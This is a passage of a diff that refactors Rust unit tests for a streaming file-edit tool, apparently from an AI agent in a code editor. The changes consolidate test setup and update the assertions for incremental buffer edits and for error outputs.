test_streaming_edit_ascending_order_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - 
context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit multiple lines in ascending order".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - EditOperation { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit multiple lines in ascending order".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + ]), + }), ToolCallEventStream::test().0, cx, ) @@ -1506,106 +1451,63 @@ mod tests { #[gpui::test] async fn test_streaming_edit_nonexistent_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; let result = 
cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Some edit".into(), - path: "root/nonexistent_file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![EditOperation { - old_text: "foo".into(), - new_text: "bar".into(), - }]), - }; - Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Some edit".into(), + path: "root/nonexistent_file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "foo".into(), + new_text: "bar".into(), + }]), + }), ToolCallEventStream::test().0, cx, ) }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; assert_eq!(error, "Can't edit file: path not found"); + assert!(diff.is_empty()); + assert_eq!(input_path, None); } #[gpui::test] async fn test_streaming_edit_failed_match(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"file.txt": "hello world"})) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; let 
result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![EditOperation { - old_text: "nonexistent text that is not in the file".into(), - new_text: "replacement".into(), - }]), - }; - Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit file".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "nonexistent text that is not in the file".into(), + new_text: "replacement".into(), + }]), + }), ToolCallEventStream::test().0, cx, ) }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { panic!("expected error"); }; assert!( @@ -1615,126 +1517,22 @@ mod tests { } #[gpui::test] - async fn test_streaming_edit_overlapping_edits_out_of_order(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - // Multi-line file so the line-based fuzzy matcher can resolve each edit. 
- fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); + async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - // Edit A spans lines 3-4, edit B spans lines 2-3. They overlap on - // "line 3" and are given in descending file order so the ascending - // sort must reorder them before the pairwise overlap check can - // detect them correctly. 
- let result = cx - .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Overlapping edits".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 3\nline 4".into(), - new_text: "SECOND".into(), - }, - EditOperation { - old_text: "line 2\nline 3".into(), - new_text: "FIRST".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; + // Send partials simulating LLM streaming: description first, then path, then mode + sender.send_partial(json!({"display_description": "Edit lines"})); + cx.run_until_parked(); - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("Conflicting edit ranges detected"), - "Expected 'Conflicting edit ranges detected' but got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = 
Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Send partials simulating LLM streaming: description first, then path, then mode - sender.send_partial(json!({"display_description": "Edit lines"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt" - })); - cx.run_until_parked(); + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt" + })); + cx.run_until_parked(); // Path is NOT yet complete because mode hasn't appeared — no buffer open yet sender.send_partial(json!({ @@ -1745,7 +1543,7 @@ mod tests { cx.run_until_parked(); // Now send the final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", @@ -1761,42 +1559,11 @@ mod tests { #[gpui::test] async fn test_streaming_path_completeness_heuristic(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) 
= ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send partial with path but NO mode — path should NOT be treated as complete sender.send_partial(json!({ @@ -1809,15 +1576,15 @@ mod tests { sender.send_partial(json!({ "display_description": "Overwrite file", "path": "root/file.txt", - "mode": "overwrite" + "mode": "write" })); cx.run_until_parked(); // Send final - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Overwrite file", "path": "root/file.txt", - "mode": "overwrite", + "mode": "write", "content": "new content" })); @@ -1830,43 +1597,12 @@ mod tests { #[gpui::test] async fn test_streaming_cancellation_during_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver, mut cancellation_tx) = ToolCallEventStream::test_with_cancellation(); - - let tool = Arc::new(StreamingEditFileTool::new( - 
project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial sender.send_partial(json!({"display_description": "Edit"})); @@ -1881,7 +1617,7 @@ mod tests { drop(sender); let result = task.await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { panic!("expected error"); }; assert!( @@ -1892,42 +1628,14 @@ mod tests { #[gpui::test] async fn test_streaming_edit_with_multiple_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Simulate fine-grained streaming of the 
JSON sender.send_partial(json!({"display_description": "Edit multiple"})); @@ -1966,7 +1674,7 @@ mod tests { cx.run_until_parked(); // Send final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", @@ -1988,36 +1696,10 @@ mod tests { #[gpui::test] async fn test_streaming_create_file_with_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream partials for create mode sender.send_partial(json!({"display_description": "Create new file"})); @@ -2026,23 +1708,23 @@ mod tests { sender.send_partial(json!({ "display_description": "Create new file", "path": "root/dir/new_file.txt", - "mode": "create" + "mode": "write" })); cx.run_until_parked(); sender.send_partial(json!({ "display_description": "Create new file", "path": 
"root/dir/new_file.txt", - "mode": "create", + "mode": "write", "content": "Hello, " })); cx.run_until_parked(); // Final with full content - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Create new file", "path": "root/dir/new_file.txt", - "mode": "create", + "mode": "write", "content": "Hello, World!" })); @@ -2055,45 +1737,14 @@ mod tests { #[gpui::test] async fn test_streaming_no_partials_direct_final(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send final immediately with no partials (simulates non-streaming path) - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", @@ -2109,42 +1760,14 @@ mod tests { #[gpui::test] async fn 
test_streaming_incremental_edit_application(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream description, path, mode sender.send_partial(json!({"display_description": "Edit multiple lines"})); @@ -2212,7 +1835,7 @@ mod tests { ); // Send final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", @@ -2238,42 +1861,11 @@ mod tests { #[gpui::test] async fn test_streaming_incremental_three_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "aaa\nbbb\nccc\nddd\neee\n" - }), - ) - .await; - let project = Project::test(fs.clone(), 
[path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup: description + path + mode sender.send_partial(json!({ @@ -2304,14 +1896,16 @@ mod tests { })); cx.run_until_parked(); - // Verify edit 1 applied + // Verify edit 1 fully applied. Edit 2's new_text is being + // streamed: "CCC" is inserted but the old "ccc" isn't deleted + // yet (StreamingDiff::finish runs when edit 3 marks edit 2 done). let buffer_text = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) .unwrap(); project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nccc\nddd\neee\n")); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCCccc\nddd\neee\n")); // Edit 3 appears — edit 2 is now complete and should be applied sender.send_partial(json!({ @@ -2326,17 +1920,18 @@ mod tests { })); cx.run_until_parked(); - // Verify edits 1 and 2 both applied + // Verify edits 1 and 2 fully applied. 
Edit 3's new_text is being + // streamed: "EEE" is inserted but old "eee" isn't deleted yet. let buffer_text = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) .unwrap(); project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\neee\n")); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\nEEEeee\n")); // Send final - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", @@ -2356,42 +1951,11 @@ mod tests { #[gpui::test] async fn test_streaming_edit_failure_mid_stream(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup 
sender.send_partial(json!({ @@ -2425,16 +1989,17 @@ mod tests { })); cx.run_until_parked(); - // Verify edit 1 was applied - let buffer_text = project.update(cx, |project, cx| { + let buffer = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + project.get_open_buffer(&pp, cx).unwrap() }); + + // Verify edit 1 was applied + let buffer_text = buffer.read_with(cx, |buffer, _cx| buffer.text()); assert_eq!( - buffer_text.as_deref(), - Some("MODIFIED\nline 2\nline 3\n"), + buffer_text, "MODIFIED\nline 2\nline 3\n", "First edit should be applied even though second edit will fail" ); @@ -2457,131 +2022,43 @@ mod tests { drop(sender); let result = task.await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; + assert!( error.contains("Could not find matching text for edit at index 1"), "Expected error about edit 1 failing, got: {error}" ); + // Ensure that first edit was applied successfully and that we saved the buffer + assert_eq!(input_path, Some(PathBuf::from("root/file.txt"))); + assert_eq!( + diff, + "@@ -1,3 +1,3 @@\n-line 1\n+MODIFIED\n line 2\n line 3\n" + ); } #[gpui::test] - async fn test_streaming_overlapping_edits_detected_naturally(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - 
let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Setup - sender.send_partial(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 targets "line 1\nline 2" and replaces it. - // Edit 2 targets "line 2\nline 3" — but after edit 1 is applied, - // "line 2" has been removed so this should fail to match. - // Edit 3 exists to make edit 2 "complete" during streaming. 
+ // Setup + single edit that stays in-progress (no second edit to prove completion) sender.send_partial(json!({ - "display_description": "Overlapping edits", + "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", - "edits": [ - {"old_text": "line 1\nline 2", "new_text": "REPLACED"}, - {"old_text": "line 2\nline 3", "new_text": "ALSO REPLACED"}, - {"old_text": "line 3", "new_text": "DUMMY"} - ] })); cx.run_until_parked(); - // Edit 1 was applied, edit 2 should fail since "line 2" no longer exists - drop(sender); - - let result = task.await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("Could not find matching text for edit at index 1"), - "Expected overlapping edit to fail naturally, got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Setup + single edit that stays in-progress (no second edit to 
prove completion) sender.send_partial(json!({ "display_description": "Single edit", "path": "root/file.txt", @@ -2590,7 +2067,10 @@ mod tests { })); cx.run_until_parked(); - // Buffer should NOT be modified — the single edit is still in-progress + // The edit's old_text and new_text both arrived in one partial, so + // the old_text is resolved and new_text is being streamed via + // StreamingDiff. The buffer reflects the in-progress diff (new text + // inserted, old text not yet fully removed until finalization). let buffer_text = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) @@ -2599,12 +2079,12 @@ mod tests { }); assert_eq!( buffer_text.as_deref(), - Some("hello world\n"), - "Single in-progress edit should not be applied during streaming" + Some("goodbye worldhello world\n"), + "In-progress streaming diff: new text inserted, old text not yet removed" ); // Send final — the edit is applied during finalization - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", @@ -2620,44 +2100,12 @@ mod tests { #[gpui::test] async fn test_streaming_input_partials_then_final(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input): (ToolInputSender, 
ToolInput) = + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input): (ToolInputSender, ToolInput) = ToolInput::test(); - let (event_stream, _event_rx) = ToolCallEventStream::test(); - let task = cx.update(|cx| { - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run(input, event_stream, cx) - }); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send progressively more complete partial snapshots, as the LLM would sender.send_partial(json!({ @@ -2681,7 +2129,7 @@ mod tests { cx.run_until_parked(); // Send the final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", @@ -2697,44 +2145,12 @@ mod tests { #[gpui::test] async fn test_streaming_input_sender_dropped_before_final(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input): (ToolInputSender, ToolInput) = + let (tool, _project, _action_log, 